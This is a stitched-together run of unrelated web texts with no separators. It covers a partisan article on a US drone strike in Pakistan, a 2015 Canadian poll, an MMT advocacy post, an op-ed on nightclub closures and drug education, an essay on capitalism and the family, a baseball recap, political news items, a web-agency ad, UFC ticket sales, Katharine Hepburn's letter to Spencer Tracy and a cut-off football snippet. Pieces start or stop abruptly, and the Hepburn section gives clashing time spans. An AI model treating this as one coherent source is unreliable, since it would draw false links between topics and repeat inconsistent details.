The Pentagon's story is that the incident was a result of “friendly fire,” a mistaken clash in which both sides bore blame. Pakistan's military has categorically rejected this account. In any case, the US military is strongly opposed to issuing any apology, holding Pakistan responsible for harboring forces fighting the US occupation of Afghanistan, in particular the so-called Haqqani network, which was blamed for the coordinated attacks in the center of Kabul and other areas on April 15.
The Obama White House is not about to cross the Pentagon on such an issue in an election year. Moreover, an apology would cut across the right-wing re-election campaign being waged by the Democratic Party, which is extolling the US Seal assassination of Osama bin Laden in Pakistan a year ago and suggesting that Obama is more militarily aggressive than his presumptive Republican rival Mitt Romney.
According to some reports, the US and Pakistan were prepared to work out some sort of face-saving statement that would fall considerably short of the apology, which had been set as part of the “terms of engagement” in a resolution approved by the Pakistani parliament last month.
The same resolution demanded an immediate halt to the drone strikes. Sunday's attack was the first on a target inside Pakistan since March 30. While Grossman left Pakistan Friday night with no agreement, Pakistani officials reported that a team of 10 US officials from the State and Treasury departments, the Pentagon and other agencies had remained in Islamabad to iron out an deal.
The latest drone strike, however, has made it more difficult to reach a bargain with Washington. The brazen attacks on Pakistani soil and the resulting loss of civilian lives has provoked widespread anger in Pakistan, which the country's ruling elite has had to take into account, even as the government has in the past collaborated with the drone campaign, going so far as to provide the CIA with a base inside Pakistan for the pilotless aircraft.
The Washington Post quoted an unnamed Pakistani government official as saying, “When a duly elected democratic Parliament says three times not to do this, and the US keeps doing it, it undermines democracy.” In reality, what it undermines is the credibility of the government and its attempt to mask its continued dependence upon US imperialism, which treats it as a neocolonial subject.
The Associated Press quoted unnamed American officials as stating that Washington has “no intention of stopping the covert drone program in Pakistan.”
The US intransigence on both the drone attacks and the apology for the November massacre of Pakistani troops appears likely to lead at least to a delay in any reopening of Pakistani supply routes to Afghanistan. It may also result in Pakistan boycotting a NATO summit meeting to be held later this month in Chicago, centering on future operations in Afghanistan.
The strike on Pakistan came on the same day that White House counterterrorism advisor John Brennan issued an unusual public defense of the CIA's drone missile attacks in various parts of the globe. While the drone campaigns have been widely reported in the media and are no secret in the countries where Hellfire missiles are claiming their victims, the official US position has been that it is a covert program, not to be officially acknowledged.
Appearing in Sunday television news interviews, followed by a Monday speech at the Woodrow Wilson Center, Brennan claimed that the extra-territorial and extra-judicial assassinations by drone attacks were both legal and effective.
“The constitution empowers the president to protect the nation from any imminent threat of attack,” Brennan said in the Monday speech. “It is hard to imagine a tool that can better minimize the risk to civilians than remotely piloted aircraft.”
The claim that these drone strikes are aimed at protecting the US from “imminent threat of attack” is a lie. As US officials acknowledged, Sunday's attack in Pakistan was directed at elements who were allegedly preparing not to attack the US, but rather to resist the US military occupation of Afghanistan.
In Yemen, they are aimed against armed opponents of the US-backed regime. The White House last month approved a CIA request for permission to stage so-called “signature strikes” in which targets may be selected on the basis of “suspicious activity” with no knowledge of who is being killed.
While extolling the “laser-like” precision of drone strikes, Brennan said that, “Unfortunately, in war, there are casualties, including among the civilian population.” While acknowledging that “innocent civilians have been killed in these strikes,” he claimed that such deaths are “exceedingly rare, but it has happened. When it does, it pains us and we regret it deeply, as we do any time innocents are killed in war.”
He added, “Sometimes you have to take a life to save lives.”
There have been some 3,000 Pakistanis killed in drone attacks, of whom only 170 have been identified as known “militants”.
CTVNews.ca Staff
Sixty-seven per cent of voters thinks it's time for change, and 37 per cent think the Liberal Party is most likely to deliver that change, according to a new Nanos Research survey for CTV and The Globe and Mail.
When asked which federal party “could deliver the greatest change from the Conservative government that would be appealing to you personally,” the Liberals had a strong lead over the NDP:
Liberals: 37 per cent
NDP: 25 per cent
Green: 9 per cent
Bloc Quebecois: 2 per cent
None: 20 per cent
Unsure: 6 per cent
However, the Conservatives had a slight edge when respondents were asked which party was least likely to make governing mistakes -- although they were still within the margin of error of the Liberals.
The New Democrats, who have never formed a federal government, were in third.
Of the major parties, the Conservatives and Liberals were seen as the least likely to make governing mistakes. Seventeen per cent of those surveyed thought the NDP were the least likely to make mistakes governing.
Here are the results when respondents were asked, “Which federal party, if they were to form a government, would be least likely to make mistakes as they governed?”:
Conservatives: 28 per cent
Liberals: 26 per cent
NDP: 17 per cent:
Green: 2 per cent
Bloc Quebecois: 2 per cent
None: 17 per cent
Unsure: 8 per cent
The New Democrats were at the top when voters were asked which party would be the most ethical in terms of how it governed, although the Liberals and Green Party were within the margin of error.
The Conservatives came in fourth:
NDP: 22 per cent
Green: 21 per cent
Liberals: 20 per cent
Conservatives: 17 per cent
Bloc Quebecois: 1 per cent
None: 11 per cent
Unsure: 7 per cent
Meanwhile, the Conservatives and Liberals were tied on which party would offer the most stable government:
Conservatives: 35 per cent
Liberals: 35 per cent
NDP: 15 per cent
Green: 1 per cent
Bloc Quebecois: 1 per cent
None: 5 per cent
Unsure: 8 per cent
While a majority of voters say they want change, there was no single, standout reason why. But the most popular responses were that the Conservatives had a bad track record, did not share the same values, or were anti-democratic.
For those who did not want change, most said they were satisfied with the current government. Others said there was no credible alternative, or the current government had the most experience.
It's time for change because the current government…
Has a bad track record: 25.9 per cent
Does not share my values: 20.7 per cent
Is anti-democratic and lacks transparency: 19.6 per cent
Has been in power for too long: 10.1 per cent
Has ignored climate change: 2.1 per cent
It's not time for change because…
I am satisfied with the current government: 40.4 per cent
There are no credible alternatives: 20.4 per cent
The current government can be trusted: 17 per cent
These observations are based on a RDD dual-frame (land- and cell-line) hybrid telephone and online random survey of 1,000 Canadians between October 3rd and 5th, 2015, as part of an omnibus survey. The margin of error for a survey of 1,000 respondents is plus or minus 3.1 percentage points, 19 times out of 20.
Full survey results at Nanos Research
Follow @niknanos on Twitter
Inequality and MMT
For some time now, MMT has been receiving criticism from self-identified progressives charging that MMT economists and advocates aren't concerned about one of the most pressing problems in modern democracies and especially in the US, namely, increasing and often extreme inequality. MMT supporters have responded by citing much previous work on inequality, a lot of it done at the Levy Institute, by pointing out their great concern over the problem, and their work in advocating for a Federal Job Guarantee that would do more than perhaps any other single piece of legislation to ameliorate both poverty and inequality.
Suddenly, however, the concern of MMT economists with the problem of inequality was brought home by Pavlina Tcherneva. when she developed a graphic based on data produced by Emanuel Saez and Thomas Piketty. The graphic demonstrates one of the reasons that inequality has grown so much over time, because the share of income growth during economic expansions has increasingly been concentrated in the top 10%, as time has passed since 1949. Her graphic was published in the Journal of Post-Keynesian Economics, and quickly spread on Twitter and picked up by Neil Irwin at the New York Times in an Upshot post. Here's the graphic:
After this, it will be much harder to ignorantly charge that MMT is unconcerned with economic inequality. And, hopefully, people will begin to debate MMT-based proposals for a job guarantee at a living wage legislation, universal health insurance, enforcement of financial legislation, regulation of banks, and counter-cyclic stabilization of the economy, from the viewpoint of the likely impact of this type of government activity on inequality, as well as on employment and price stability.
The MMT view of Real Fiscal Responsibility
MMT's concern with inequality flows easily from its commitment to “economics for the public purpose.” The concerns most frequently associated with MMT in the past, full employment and price stability are two aspects of public purpose. But reducing economic inequality is also a clear aspect of public purpose in democratic nations, because increasing inequality is a constant source of threats to democracy itself, since the very rich use their wealth to undermine democracy in the political system.
There are other aspects of public purpose that can be targeted by fiscal policies, and that have received attention from MMT economists. These include the following problems:
Replacing a stagnating economy with one operating at its full potential; closing the current output gap; Creating and maintaining full employment along with implementing the right to a living wage; Creating and maintaining Price stability; Implementing the human right of healthcare for everyone; Creating a world class educational system once again; Preventing further environmental degradation and ending climate change-inducing impacts of human activity before reaching the climate tipping point; Reinventing/repairing US Infrastructure and transportation systems; Reinventing US energy foundations to rely primarily on solar and wind energy, and other renewables; Eliminating racial and gender inequality; Eliminating educational inequality of opportunity; Eliminating inequality of opportunity; Reducing economic inequality over time to a level that is not threatening to democracy; Ending poverty; Creating a legal system providing equal justice for all rather than preferential treatment for the wealthy and large corporation; Compensating working people for economic deprivation caused by the crash of 2008.
Others may have a different list specifying public purpose, but assuming that this one, gleaned from the MMT literature, is not too far off the mark of important problems whose solution can be facilitated through Government spending and taxing, we'll use it to get to the MMT idea of Real Fiscal Responsibility. There are a variety of reasons why we haven't solved these problems and why they've accumulated and intensified during the past 40 years.
But one single rationale that often puts a stop to consideration of policies that might work is that “we can't afford it” or “we're running out of money” or “the Government is broke” or “the Federal Debt is too high” or “the United States Government is bankrupt”, and so, it would be fiscally irresponsible to implement this or that deficit spending to pursue a proposed policy. We certainly don't want to get the money from other needed programs or from tax increases, such advocates continue, because people can't stand tax increases.
Neoliberal views like these assume that Federal money is limited by what the Government can tax or borrow, and that using this limited resource responsibly requires deficit reduction, or balanced budgets, or paying back the debt. But this view of fiscal responsibility is based on a false premise, if you bother to read the US Constitution. That false belief is the common obstacle that blocks our efforts to solve all the problems we have listed.
There is, in fact, no constitutional limit on the amount of money our Federal Government can create and deficit spend if we expect that the impact of such spending will fulfill public purpose. And both the Federal Reserve and the Treasury can create (but not spend) money in unlimited quantities using authority delegated to them by Congress.
So, what we need to do to be fiscally responsible is not to restrict spending according to some arbitrary standard, like the debt-to-GDP ratio, or debt levels. These have nothing to do with US solvency. Rather, we must make sure that Government spending, using deficits or not, always fulfills public purpose, in the sense that it is a reasonable attempt to solve our problems in such a way as to produce the outcomes that most people think are representative of what they value for themselves, their neighbors, their communities, and their nation. That's Real Fiscal Responsibility because it is also the way to solve our major problems. And right now, solving these problems defines the meaning of public purpose.
One can see from this that Real Fiscal Responsibility is much broader than the conventional wisdom that it is about deficit reduction and eventually balanced budgets. Indeed, they don't count at all, in themselves. MMT needs to get this message out to people all over the world including the American people and the Eurozone nations. It needs to bring the idea of Real Fiscal Responsibility to everyone and banish the old, false, notion of fiscal responsibility and the austerity it rationalizes. If you want to help do that, then there is an effort going on here that you can help to do just that.
Please do it now, however, because the effort to get the idea of Real Fiscal Responsibility in opposition to the austerity-related fiscal responsibility meme needs to be done as soon as we can make it happen, before the austerians are successful in using their fiscal responsibility myth to cut Social Security and Medicare in some infernal “grand bargain.” Yes, there's a good chance they'll be trying that again after the election, and if the election results turn out as now predicted, then the chances rise even further that something will be done to hurt Social Security near the beginning of the next Congressional session, before the hoopla surrounding the 2016 elections begins to build.
How the Interactive Voter Choice System (IVCS) and the Re-inventing Democracy Project Will Accelerate the Diffusion of MMT, Help Reduce Inequality, and Enable Achieving the Other Aspects of Public Purpose
In my last post, I explained how the Interactive Voter Choice System (IVCS) will enable MMT advocates to communicate their views and persuade members of voting blocs and electoral coalitions that MMT-based policies make sense and are not negated by the need for deficit reduction or balancing budgets, in an environment with no advantage given to advocates of austerity whether based in neoliberal, or neoclassical, or any other economic approaches. MMT will have a level playing field at last, and its advocates will be part of an environment in which voting blocs will self-organize from the bottom-up.
There will be no limits on what aspects of public purpose MMT economists can target with fiscal policy in specifying Real Fiscal Responsibility, The concerns of MMT economists for economic equality and the relation of their concerns to the job guarantee proposal can be fully vetted with no systematic institutional bias to contend with. So, the MMT approach to full employment and equality will have a chance to spread much more quickly than it has in the corporate-based media environment MMT faces now.
It may seem strange that I say this last now, right after Pavlina Tcherneva's welcome breakthrough in getting attention at the Times for her work. However, we've seen breakthroughs for MMT before at the major media outlets. They're exciting for MMT advocates, and they are part of a gathering stream of change that will bring acceptance for MMT eventually.
But, I think that for right now, they are but minor tributaries into what may become a mighty stream some years from now. We still need to speed this up. There are still too many people who want full time jobs who find them unavailable. There are too many people who are desperately poor and cannot find the full time employment that would give them hope for better lives. And members of the 99% are still finding themselves getting more unequal compared to the 1% with each passing year, and are seeing their hopes evaporate in our smoke and mirrors economy. At this point, I'll end with some words from my last post.
In the kind of political environment the IVCS will create, new ideas, solutions, and paradigms will be able to spread a lot faster than in the structured world of the mass media, dominated as it is by advertising money from the financial and business elites. MMT will finally have a fair chance to compete with other economic paradigms. That's why I'm asking MMT proponents to support development of the IVCS by the Re-invent Democracy project and join with the international Re-invent Democracy community.
If you want to learn more about the project to bring this web platform for re-inventing democracy to fruition, and how it can restore the ability of democracies to change their leaders, then please go to reinventdemocracy.net, and reinventdemocracyfoundation.net for more information.
And one more thing, over the past four + years since discovering MMT and the Re-invent Democracy effort, I've worked hard for both, and for the anti-austerity notion of Real Fiscal Responsibility, spending my time thinking, blogging, and writing about these things, because in my mind they're all connected. MMT provides us the conceptual tools to create a better future for the people in all nations; and the Re-invent Democracy effort with IVCS enables effective political action that can bring about that future.
So, I'm asking everyone to join me in both these efforts. They're both necessary keys to a great future. But, we'll never get there unless everyone supports efforts like these twin departures from what has gone before as much as they can.
(Cross-posted from New Economic Perspectives.)
On 7th September 2016, after a well publicised review into the deaths of two people at Fabric in London, the nightclub received a permanent closure notice and the license was revoked. Despite campaigning from DJ's (Seth Troxler, Eats Everything, Jackmaster to name but a few), venue-goers and politicians – including the Mayor of London Sadiq Khan, the club looked to keep its doors closed forever.
This of course caused uproar among the many. £200,000 was raised towards a legal fund to fight the closure, and in November 2016 Fabric made a deal with Islington Council, the borough in which its found, to re-open the club with strict new conditions. A brand-new ID system, a lifetime ban for anyone found dealing or in possession of drugs, and no under 19's allowed between Friday 8pm to Monday 8am. Great, that's solved then I guess. Fabric is open and we can all go along and have a lovely time and forget the closure ever happened. Wrong.
It's now a year on, and today saw the loss of another clubbing institute in Birmingham after having its license permanently revoked due to a drug-related death. 19-year-old student Michael Trueman, was understood to have taken MDMA at The Rainbow Venues at a Halloween event, and tragically lost his life. He was discovered in a disorientated state by security inside the club and was taken by ambulance to Heartlands Hospital, where he passed away the following evening.
To me and anyone else involved in this world of love, freedom and music – it is plain to see that the deaths which take place in these venues are caused by nothing more than ignorance and a lack of understanding when it comes to the use of illegal drugs. It is so frustratingly clear that this is something which cannot be stopped in its entirety. The war on illegal drugs in music venues will never be won, however, it could be solved in armistice – between councils, educational institutes and with each other. How many more of these incidents must the government stand aside and watch until actively intervening, as opposed to ignoring and painting over?
The closure of the venues does nothing more than push the young dancers to a different venue, wherein drugs will still be consumed and these deaths will still occur – and another license will be revoked. If this is the case – streets, pubs, schools, universities, shops, hotels, and pretty much anywhere else you can think of where a substance-related death has happened – should close. Sounds ridiculous, right?
By brushing the real issue under the carpet (lack of education surrounding the consumption of illegal drugs), this becomes a monumental roadblock in moving forwards and making a real change. We can't rid venues of drugs, but we can educate the young, and work to prevent tragedies such as the lives lost at Fabric and Rainbow Venues. Educating on the dangers of consuming too much or too many different substances. Listening to young people who may want to try drugs, or are worried that they cannot find help if they are trying drugs for the first time. Advising on how to be safe and look after yourselves, as well as each other. This information is a basic necessity which needs to be readily available. This is where the focus should be, and with every venue that closes we get further and further away from this focus.
So they have taken away @rainbowvenues licence in Birmingham bc someone died in the club. This isn't going to stop people taking drugs in raves. There needs to be another, more sensible solution. #RainbowLicence — TwEats Everything® (@eats_everything) November 28, 2017
The Loop, an organisation focused on drug testing and prevention of harm to club goers, is one of the only organisations of their kind in the U.K. They're in partnership with VICE and Mixmag, and also working alongside forward-thinking Cumbria Constabulary and Manchester Police to educate on the use of drugs at festivals, clubs, and anywhere else you'll find them. Thanks to The Loop, you can find out more about the drugs you're taking, and how to keep you and your friends safe. You can also read an incredibly brave and moving testimonial from a mother named Anne Marie Cockburn, who lost her daughter to an accidental ecstasy overdose. Anne believes that had campaigns like #CrushDabWait, the educational MDMA crystal campaign from The Loop, existed – her daughter may still be here today.
Visit The Loops website here to find out about their festival drug testing initiative and information on how to look after yourselves and one another. Talk To Frank is also a UK drugs charity, with unbiased information on substances and an A-Z of what you'll find circulating on the streets and dance floors – you can visit them here.
The Rainbow Venues have since released an official statement, explaining their decision to appeal:
While the right resists same-sex marriage and the left thinks that cultural paradigm shifts are responsible for the transformation of today's family, the fact is the creative powers of the market are largely responsible for the face of the family in the early 21st century.
Certainly, government regulation, including the welfare state, have influenced family life in the last four decades, but the long-run positive fundamental transformations are due to economic growth fueled by the market.
For conservatives who celebrate romantic love and pay lip service to the importance of the market, but also complain about the divorce rate and working women, this poses some problems.
Before capitalism, families farmed and made crafts to survive. Larger families meant more workers and a form of old-age insurance. Men and women worked the fields. Older children helped in the fields and took care of the younger siblings. Productive compatibility made marriages work, not romance.
The industrial revolution brought increased wage labor, so work for men, women and children moved out of the house to the factory. As wages increased, women and children slowly exited the labor market, as men earned enough to support their families.
Children changed from producers to consumers of resources. Economic progress meant parents could raise fewer children, and afford to educate them. More education meant more opportunity for the following generation. Women took over the home while men went to work.
In the 20th century, technology and market-driven economic growth began to undo what looked like a stable family structure. Women entered the labor force beginning in the 1920s when modern home appliances and fewer children freed up their time. The “Rosie the Riveter” experience of many women during World War II accelerated this trend slightly, but the growth in the number of working women was already well underway thanks to economic growth.
The 1950s are often revered as the height of the so-called “traditional family.” There is some truth to this claim. But women, and to a lesser extent men, were hardly as happy as their fictional counterparts, and more wives were in the workforce than “Ozzie and Harriet” and “Leave It to Beaver” seemed to suggest. After all, the actresses on those shows were themselves working moms.
Contrary to conservative belief, the women's movement of the 1960s was more a consequence of the wealth and opportunities that capitalism made possible than a cause of women leaving the home. It was yet another way capitalism freed individuals from the coercive power of the state and promoted social equality.
In the decades since, these trends have accelerated. Wages have increased and household labor has decreased, thanks to microwaves, washers, dryers, and many other items. Families with modest incomes eat out more frequently, pay for child care, have clothing dry cleaned, even hire house cleaners. Thirty years ago, nail salons were for wealthy women, now they are in every strip mall.
A distinct trend in the last 40 years is the increase in working women with pre-school-aged kids. The smaller size of families and increased real incomes of women, whether married or single, have made paying for child-care economically feasible, and the extension of formal education to ages 3 and 4, in some cases, has accelerated this trend.
Marriage today is all about being happy and having a family has become increasingly about the personal satisfaction from raising children.
For conservatives who celebrate romantic love and pay lip service to the importance of the market, but also complain about the divorce rate and working women, this poses some problems: it is capitalism that is responsible for romantic love being at the center of marriage, for higher incomes for women, and thus for the greater demand for and lower cost of divorce.
We see the extension of these trends in the move to legalize same-sex marriage. Capitalism made the notion of “gay identity” possible, by separating the ability to earn income from the heterosexual family. This made it possible to live one's life as gay or lesbian in a way that had never been possible before.
The gradual increase in social visibility of first gays then lesbians over the 20th century reflects the shift in marriage and the family from an economic to a psychological institution, again made possible by capitalism. And as emotional fulfillment became a central function of marriage, it is no surprise that gays and lesbians would want to participate. When the number of childless couples continues to grow and when more heterosexual couples have children through adoption or artificial reproduction, what differentiates them from same-sex couples?
Even those liberals who recognize the ways in which capitalism has made gay identity and same-sex marriage possible still go out of their way to note that this does not mean that capitalism is actually good.
And although conservatives understand the ways in which capitalism's economic effects cannot be controlled, they still object to cultural changes that can only be halted by shutting down the very economic processes they claim to appreciate.
Both sides miss the deep connection between economic freedom and the improvements in the family such freedom makes possible.
BALTIMORE -- The Baltimore Orioles evidently figure if they're going to work overtime, they might as well make the most of it.
Matt Wieters hit a grand slam in the bottom of the 10th inning and Baltimore withstood four solo homers by the Tampa Bay Rays in a 10-6 victory on Thursday night.
Nolan Reimold and Steve Pearce also homered for the Orioles, who have won 17 straight in extra innings, including 16 last season. It's the longest such streak since the Pittsburgh Pirates won 21 in a row from June 1959 to July 1960.
"It's huge for us to get the feel for it, how we did it last year," third baseman Manny Machado said.
Nick Markakis led off the 10th with a single against Jamey Wright (0-1). Brandon Gomes came in to face Machado, who reached on a bunt single that hugged the first baseline. Adam Jones followed with a long single to the warning track that eluded right fielder Ben Zobrist, but Markakis held up initially and could only make it to third.
Wieters drove Gomes' next pitch over the right-field wall. It was Baltimore's first game-ending grand slam since Harold Baines did it against the Chicago White Sox on May 4, 1999.
"I felt like it was going to go," Wieters said. "I knew it was going to get a run in, whether it went out or not. I knew the game was going to be over. That was a good feeling."
Asked if he'd ever finished a game with a grand slam, Wieters replied, "I don't think a grand slam. Anytime you get a walk-off and get to celebrate with your teammates, it's a good day."
Troy Patton (1-0) worked the 10th for the Orioles, who took two of three from their AL East rivals.
Desmond Jennings and Evan Longoria homered for the Rays in the first inning, Jose Molina connected in the sixth and James Loney went deep in the eighth against Darren O'Day to knot the score at 6.
"Offense was fantastic," Tampa Bay manager Joe Maddon said. "We did a lot of good things, but Baltimore outplayed us in this series."
Tampa Bay starter David Price, the reigning AL Cy Young Award winner, walked off the mound with the lead but remained winless in four starts this season.
The Rays were ahead 5-4 when Price gave up a leadoff double to J.J. Hardy in the seventh inning. Jake McGee then served up a 3-2 pitch that Pearce drove over the left-field wall -- his first hit in 16 at-bats this season.
Price gave up five runs and eight hits, striking out six. The left-hander is 0-1 with an uncharacteristic 6.26 ERA.
"It's a frustrating time for myself and this team right now," Price said. "I play this game to win, and most importantly, I want our team to win every fifth day when it's my time to pitch. I'm not helping the team right now so I'll have to make some adjustments and find what works."
Maddon, who used 13 different lineups in the Rays' first 14 games, stayed with the same batting order he used Wednesday night against Orioles starter Chris Tillman.
"I liked our approach against Tillman, so why not run the same group back out there against a very similar pitcher?" Maddon said before the game, referring to Orioles starter Miguel Gonzalez.
The Rays scored six runs on 11 hits Wednesday, and they put up those same exact numbers on Thursday -- but lost.
Jennings got the Rays started with his second leadoff homer of the series, a drive to left on a 1-2 pitch. Two outs later, Longoria hit his third home run in four games.
A sacrifice fly by Jennings made it 3-0 in the second before Zobrist fouled out with three runners on, leaving the Rays 0 for 12 this season with the bases loaded.
In the bottom half, Chris Davis singled in a run and Reimold homered to tie the score.
A throwing error by Hardy provided the Rays an unearned run and a 4-3 lead in the third.
After Baltimore put runners on the corners with two outs in the fifth, Machado hit an RBI double off the left-field wall. But Markakis overran third base and was tagged out to end the inning with the score tied at 4.
Game notes
The Orioles open a three-game interleague series Friday against the Los Angeles Dodgers, who make their first visit to Camden Yards since 2002. Baltimore manager Buck Showalter is looking forward to being reunited with Dodgers skipper Don Mattingly, who played for Showalter on the Yankees in the 1990s. "It's not surprising he's managing, and he's a good one," Showalter said. ... After going 2-7 on a trip through Texas, Boston and Baltimore, the Rays begin a six-game homestand Friday night against the Oakland Athletics. "Yeah, we're ready to get back. It will be nice to get home and get things back in order," Maddon said. ... Orioles RHP Steve Johnson (strained back muscle) threw four innings in an extended spring training game and will next be sent on a rehabilitation assignment at an affiliate yet to be determined. ... Baltimore did not allow a first-inning run until Tampa Bay came to town and scored four runs on four homers over three games.
President Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say he should get less than 10 years in prison MORE's top economic adviser, Gary Cohn, said Wednesday he plans to stay in his post after helping pass a sweeping tax overhaul bill through Congress.
“I'm staying,” Cohn said during an event sponsored by Axios.
The National Economic Council chairman said he is eager to participate in upcoming efforts to overhaul the welfare system and pass an infrastructure bill.
“It's a once-in-a-lifetime opportunity,” he said.
ADVERTISEMENT
Cohn is seeking to push back on widespread speculation he would leave the administration after the completion of the GOP tax push.
The former Goldman Sachs president had been seen as one of the president's closest advisers and was even considered as the next Federal Reserve chairman.
But his relationship with the president suffered after he criticized Trump's reaction to the racially charged violence at a white supremacist rally over the summer in Charlottesville, Va.
While their relationship eventually improved, speculation still swirled about Cohn's future in the White House after tax reform wrapped up.
Cohn's departure would be a blow to a White House that is expecting to lose a number of top advisers early next year.
Deputy national security adviser Dina Powell, an ally of Cohn, has already announced she plans to leave her role in January.
Omarosa Manigault Newman, the top communications aide for the White House Office of Public Liaison, is also leaving.
President Obama's signature healthcare law has to be on the table for cuts as Congress tried to negotiate a deal to avoid the "fiscal cliff," House Speaker John Boehner John Andrew BoehnerEx-GOP lawmaker joins marijuana trade group Crowley, Shuster moving to K Street On unilateral executive action, Mitch McConnell was right — in 2014 MORE (R-Ohio) wrote in an op-ed.
"We can't afford it, and we can't afford to leave it intact," Boehner John Andrew BoehnerEx-GOP lawmaker joins marijuana trade group Crowley, Shuster moving to K Street On unilateral executive action, Mitch McConnell was right — in 2014 MORE wrote in the Cincinnati Enquirer. "That's why I've been clear that the law has to stay on the table as both parties discuss ways to solve our nation's massive debt challenge."
Republicans have already made clear that they hope to go after the law's insurance subsidies in upcoming debt talks. The subsidies represent billions of dollars that will, in 2014, help the uninsured pay for private insurance coverage. But Republicans want to cut into the subsidies to help pay for a fiscal-cliff agreement.
ADVERTISEMENT
Boehner went on to argue that the push to repeal the Affordable Care Act will be aided by strict congressional oversight. He also praised Ohio Gov. John Kasich (R-Ohio) for refusing to implement a state-based insurance exchange, but neglected to mention that the choice invites the federal government to operate Ohio's exchange."I'm proud of our governor and lieutenant governor for taking this stand and resisting the federal takeover of health care in Ohio. Repeal of the president's health care law is critically important to the economic future of our country," Boehner wrote.
Serving industries globally with quality web solutions since 1997 has made us one of the best web service providers globally
How and why partnering with IndiaNIC gets you an extra edge?
Flexibility for You
Our engagement models are designed to offer you the complete flexibility of hiring developers as per your budget and project requirements
Vast Experience
You can gain from our two decades of experience in web development domain, we have served 3500+ clients across different industry verticals
Data Security Assurance
All our employees follow NDA and never sell your project details to any third party, which means that your projects are in the safest hands
Separate Web and App Teams
We have separate teams for addressing various web and app development requirements of your project to assure quality and timely delivery
We're just 4 days away from UFC on FOX 16 at the United Center in Chicago, Illinois. The card features the bantamweight championship rematch between T.J. Dillashaw and Renan Barao, which headlined UFC 173 last May, and also has a #1 contender co-main event between Miesha Tate and Jessica Eye. On paper, this is a pretty good and potentially very exciting network television card, but ticket sales in the "Windy City" have been ... well ... they're not blowing anyone away.
As of about 7 PM ET on Tuesday, these are the available seats at the United Center per TicketMaster's website. The blue dots are unsold seats and the pink-ish ones are resales. You can right-click on the image and open it in a new tab for a larger size.
Looks like there's a lot of selling to be done. Current prices on TicketMaster are going for as low as $40, which is basically for the top bowl of seats, while the most expensive ones are as high as $650 for floor seats near where the fighters would walk out. Regardless, don't expect anything close to a sellout this Saturday.
Here are the past Chicago gates for its FOX shows:
(Jan 2014) UFC on FOX: Henderson vs. Thomson - 10,895 announced attendance, $863,655 live gate
(Jan 2013) UFC on FOX: Johnson vs. Dodson - 16,091 announced attendance, $1.270 million live gates
(Jan 2012) UFC on FOX: Evans vs. Davis, 16,963 attendance (1,091 comped), $1,270,960 live gate
And, while not in Chicago, UFC 90: Silva vs. Cote produced a $2.8 million gate in nearby Rosemont.
It's definitely a shame that a card like this isn't getting much local buzz, but perhaps the lack of any high-profile Illinois (or nearby state) MMA fighters on the event has played an impact. For example, Anthony Pettis could've been one of the "local" names given Milwaukee is about a 2 hour drive away from Chicago, but he and teammate Erik Koch both withdrew due to injuries. Heavyweight contender Andrei Arlovski is a Chicago resident, but he competed at UFC 187 in May and a fast turnaround was unlikely.
Pricing, local advertisement (or lack thereof), and/or the minimal drawing power of Dillashaw and Barao are also likely contributing factors. Ultimately, a UFC title may be on the line between two highly talented and entertaining fighters, but that's evidently not enough for Chicagoans to physically attend the event.
Dear Spence,
Who ever thought that I'd be writing you a letter. You died on the 10th of June in 1967. My golly, Spence, that's twenty-four years ago. That's a long time. Are you happy finally? Is it a nice long rest you're having? Making up for all your tossing and turning in life. You know, I never believed you when you said that you just couldn't get to sleep. I thought, Oh—come on—you sleep—if you didn't sleep you'd be dead. You'd be so worn out. Then remember that night when—oh, I don't know, you felt so disturbed. And I said, Well, go on in—go to bed. And I'll lie on the floor and talk you to sleep. I'll just talk and talk and you'll be so bored, you're bound to drift off.
Well, I went in and got an old pillow and Lobo the dog. I lay there watching you and stroking Old Dog. I was talking about you and the movie we'd just finished—Guess Who's Coming to Dinner—and my studio and your new tweed coat and the garden and all the nice sleep-making topics and cooking and dull gossip, but you never stopped tossing—to the right, to the left—shove the pillows—pull the covers—on and on and on. Finally—really finally—not just then—you quieted down. I waited a while—and then I crept out.
You told me the truth, didn't you? You really could not sleep.
And I used to wonder then—why? I still wonder. You took the pills. They were quite strong. I suppose you have to say that otherwise you would never have slept at all. Living wasn't easy for you, was it?
What did you like to do? You loved sailing, especially in stormy weather. You loved polo. But then Will Rogers was killed in that airplane accident. And you never played polo again—never again. Tennis, golf, no, not really. You'd bat a few balls. Fair you were. I don't think that you ever swang a golf club. Is "swang" a word? Swimming? Well, you didn't like cold water. And walking? No, that didn't suit you. That was one of those things where you could think at the same time—of this, of that, of what, Spence? What was it? Was it some specific life thing like Johnny being deaf, or being a Catholic and you felt a bad Catholic? No comfort, no comfort. I remember Father Ciklic telling you that you concentrated on all the bad and none of the good which your religion offered. It must have been something very fundamental and very ever-present.
And the incredible fact. There you were—really the greatest movie actor. I say this because I believe it and also I have heard many people of standing in your business say it. From Olivier to Lee Strasberg to David Lean. You name it. You could do it. And you could do it with that glorious simplicity and directness: you could just do it. You couldn't enter your own life, but you could become someone else. You were a killer, a priest, a fisherman, a sportswriter, a judge, a newspaperman. You were it in an instant.
You hardly had to study. You learned the lines in no time. What a relief! You could be someone else for a while. You weren't you—you were safe. You loved to laugh, didn't you? You never missed those individual comics: Jimmy Durante, Phil Silvers, Fanny Brice, Frank McHugh, Mickey Rooney, Jack Benny, Burns and Allen, Smith and Dale, and your favorite, Bert Williams. Funny stories: you could tell them—and brilliantly. You could laugh at yourself. You enjoyed very much the friendship and admiration of people like the Kanins, Frank Sinatra, Bogie and Betty, George Cukor, Vic Flemming, Stanley Kramer, the Kennedys, Harry Truman, Lew Douglas. You were fun with them, you had fun with them, you felt safe with them.
But then back to life's trials. Oh hell, take a drink—no-yes-maybe. Then stop taking the drink. You were great at that, Spence. You could just stop. How I respected you for that. Very unusual.
Well, you said on this subject: never safe until you're seven feet underground. But why the escape hatch? Why was it always opened—to get away from the remarkable you?
What was it, Spence? I meant to ask you. Did you know what it was?
What did you say? I can't hear you…
On June 10th of 1967, Spencer Tracy — a Hollywood star who was nominated for nine Best Actor Oscars during his career, two of which he won — passed away after suffering a heart attack at the home he shared with his partner, Katharine Hepburn . Eighteen years later, Hepburn wrote him a letter.The clip above shows Katharine Hepburn reading that letter in the 1986 documentary, The Spencer Tracy Legacy . The text below, which differs very slightly, is exactly as printed in Hepburn's 1991 autobiography, Me: Stories of My Life
Dundee manager John Brown warned he would walk away from football if he is punished for his criticism of referee Alan Muir after his side's relegation.
Brown
"It was a blatant dive," Brown said of the incident involving Peter Pawlett.
